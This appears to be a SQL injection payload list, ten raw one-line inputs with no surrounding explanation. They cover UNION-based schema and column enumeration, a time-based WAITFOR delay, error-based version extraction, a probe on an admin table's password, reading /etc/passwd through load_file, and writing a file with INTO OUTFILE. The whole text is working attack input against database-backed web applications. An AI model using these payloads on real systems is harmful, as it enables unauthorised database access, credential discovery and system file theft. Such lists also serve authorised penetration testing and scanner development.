' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT user(),version(),database()--
' AND 1=(SELECT COUNT(*) FROM tabname); --
'; WAITFOR DELAY '0:0:5'--
' OR 1=1 AND 1=(SELECT COUNT(*) FROM admin WHERE username='admin' AND LENGTH(password)>0)--
' UNION SELECT 1,load_file('/etc/passwd'),3--
' INTO OUTFILE '/tmp/result.txt'--
' AND extractvalue(1, concat(0x7e, (SELECT @@version), 0x7e))--
